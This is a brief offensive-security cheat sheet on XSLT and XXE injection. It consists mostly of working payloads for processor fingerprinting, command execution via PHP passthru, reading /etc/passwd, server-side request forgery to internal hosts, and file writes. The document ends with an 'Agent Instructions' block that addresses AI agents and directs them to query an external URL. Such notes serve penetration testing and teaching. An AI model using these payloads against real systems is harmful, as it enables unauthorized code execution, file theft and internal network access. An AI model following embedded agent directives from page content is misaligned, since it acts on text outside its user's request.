# XXE & XSLT Injection

### Preparation

Firstly, we can inject some tags to get information about the system

```xml
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
```

### RCE (Remote Code Execution)

One method of RCE available is when the backend is running PHP and has registerPHPfunctions enabled:

```xml
<xsl:value-of select="php:function('passthru', 'ls -al')" />
```

### LFR (Local File Read)

Reading local files can be accomplished with the `copy-of` operator:

```xml
<xsl:copy-of select="document('/etc/passwd')" />
```

### XXE

If we are able to control the XML data to be processed, we can inject some tags to get local file information:

```xml
// in our XML file:
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>

// in our XSLT file:
INFO &ext_file;:
```

### SSRF

```xml
<xsl:copy-of select="document('http://[internal ip]:[port]')"/>
```

### Writing to Files

```xml
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exploit="http://exslt.org/common"
  extension-element-prefixes="exploit">
<xsl:template match="/">
    <exploit:document href="text.txt" method="text">
      testing
    </exploit:document>
</xsl:template>
</xsl:stylesheet>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.frozensoliddesigns.com/exploitation/xxe-and-xslt-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.